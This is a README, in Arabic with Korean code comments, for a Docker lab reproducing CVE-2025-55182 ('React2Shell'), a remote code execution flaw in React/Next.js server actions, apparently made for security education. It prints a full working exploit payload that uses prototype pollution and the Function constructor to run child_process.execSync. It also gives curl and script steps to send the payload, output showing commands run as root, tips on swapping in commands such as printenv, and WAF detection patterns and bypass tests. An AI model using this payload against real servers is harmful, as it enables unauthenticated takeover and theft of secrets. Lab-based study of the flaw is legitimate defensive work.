مختبر اختبار قائم على Docker لثغرة CVE-2025-55182 (React2Shell) RCE في React 19.1.0/Next.js 15.1.0. يتضمن نصوص استغلال واختبار تجاوز WAF مع NGINX/ModSecurity ومقارنة الإصدار المصحح للتعليم الأمني.
⚠️ تحذير: يحتوي هذا المشروع على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) قابلة للاستغلال فعليًا.
بيئة اختبار حاويات (Container) لاختبار الثغرة الأمنية CVE-2025-55182 (React2Shell).
🔴 CRITICAL VULNERABILITY CONFIRMED!
Successfully executed 6/7 commands
Executed Commands:
✅ whoami: root
✅ hostname: c89f1bd355b2
✅ pwd: /app
✅ id: uid=0(root) gid=0(root) groups=0(root)...
✅ uname: Linux c89f1bd355b2 6.6.87.2-microsoft-standard-WSL2...
✅ node-ver: v20.19.6
درجة CVSS: 10.0 (CRITICAL)
التأثير: تنفيذ التعليمات البرمجية عن بُعد (RCE)
المصادقة المطلوبة: لا يوجد
متجه الهجوم: الشبكة
$1:__proto__:then$B)child_process// 공격 페이로드 구조
{
"then": "$1:__proto__:then", // Object.prototype.then 오염
"status": "resolved_model",
"reason": -1,
"value": '{"then": "$B0"}', // Blob 역직렬화 트리거
"_response": {
"_prefix": "악성_코드", // 실행할 코드
"_formData": {
"get": "$1:constructor:constructor" // Function constructor 접근
}
}
}
Windows (PowerShell):
PowerShell -ExecutionPolicy Bypass -File .\run-tests.ps1 start
.\run-tests.ps1 status
يجب الانتظار حتى تصل جميع الحاويات إلى الحالة healthy (يستغرق ذلك حوالي 1-2 دقيقة).
Windows (PowerShell):
# 방법 1: PowerShell 스크립트 사용 (권장)
.\tests\exploit-working.ps1
# 방법 2: Node.js 직접 실행
node tests\exploit-working.js
### الخطوة 4: التحقق من النتائج
يمكنك التحقق من نتائج تنفيذ الأوامر في سجلات الخادم:
```bash
docker compose logs vulnerable-app --tail=20
exploit-working.js ⭐ موصى بهWindows:
# PowerShell 스크립트 (권장)
.\tests\exploit-working.ps1
# 또는 Node.js 직접 실행
node tests\exploit-working.js
ما يتم تنفيذه:
الأوامر التي يتم اختبارها:
whoami - المستخدم الحالي (root)hostname - اسم مضيف الحاويةpwd - دليل العمل (/app)id - معلومات المستخدم الكاملةuname -a - معلومات النظامnode --version - إصدار Node.js# 페이로드 파일 생성
cat > payload.txt << 'EOF'
------WebKitFormBoundary123
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\": \"$B0\"}","_response":{"_prefix":"console.log('[EXPLOIT] RCE Success');const result=require('child_process').execSync('whoami').toString();console.log('[RESULT]',result);","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary123
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundary123--
EOF
# 공격 전송
curl -X POST http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123" \
-H "Next-Action: exploit" \
--data-binary @payload.txt
# 로그 실행 확인
docker compose logs vulnerable-app --tail=20 | grep -E "\[EXPLOIT\]|\[RESULT\]"
يمكنك تعديل سكربت الهجوم لتنفيذ الأوامر التي تريدها:
// exploit-working.js 파일에서:
const tests = [
{ name: 'custom', cmd: 'ls -la /app', desc: '애플리케이션 디렉토리 목록' },
{ name: 'env', cmd: 'printenv', desc: '환경 변수 출력' }
]
| المنفذ | الخدمة | إصدار React | الغرض | حالة WAF |
|---|---|---|---|---|
| 3000 | vulnerable-app | 19.1.0 | ضعيف - اختبار CVE-2025-55182 | ❌ بدون حماية |
| 3001 | patched-app | 19.1.2 | آمن - التحقق من فعالية التصحيح | ✅ مصحح |
| 8080 | nginx → vulnerable | 19.1.0 | اختبار WAF (NGINX) | ⚠️ محدود (لا يفحص body) |
| 8081 | apache → vulnerable | 19.1.0 | اختبار WAF (ModSecurity) | ⚠️ محدود (استجابة 405) |
| 8082 | nginx → patched | 19.1.2 | اختبار الحماية المزدوجة | ✅ مصحح |
# 작동하는 공격 실행
node tests/exploit-working.js
# 예상 결과: 명령어 실행 성공
# 출력: 사용자 정보, 시스템 세부 정보 등
Windows (PowerShell):
# PowerShell 스크립트 사용
.\tests\exploit-working.ps1 -Port 3001
النتيجة المتوقعة: فشل الهجوم (يقوم React 19.1.2 بحظر الهجوم)
Windows (PowerShell):
# NGINX WAF를 통한 공격 시도
.\tests\exploit-working.ps1 -Port 8080
النتيجة المتوقعة: يتم الحظر بواسطة قواعد WAF
الموقع: nginx/nginx.conf
أنماط الكشف:
__proto__, constructor:constructor$X:__proto__ و$Bchild_process, execSync, require()%5f%5fproto%5f%5fNext-Action: #constructorسلوك الحظر:
HTTP 403 Forbidden
{
"error": "Request blocked by WAF",
"protection": "CVE-2025-55182",
"waf": "NGINX"
}
الموقع: apache/modsecurity-rules.conf
نطاق معرفات القواعد (Rule IDs): 100001-100017
القواعد الرئيسية:
__proto__# NGINX 차단 테스트
curl -X POST http://localhost:8080/ \
-H "Content-Type: application/json" \
-d '{"__proto__": {"polluted": true}}'
# 예상 응답: HTTP 403
# ModSecurity 차단 테스트
curl -X POST http://localhost:8081/ \
-H "Next-Action: test#constructor" \
-d '{"data": "test"}'
# 예상 응답: HTTP 403
# NGINX 보안 로그
docker compose exec nginx tail -f /var/log/nginx/security.log
# Apache ModSecurity 감사 로그
docker compose exec apache tail -f /var/log/apache2/modsec_audit.log
مهم: يحتوي تكوين WAF الحالي على القيود التالية: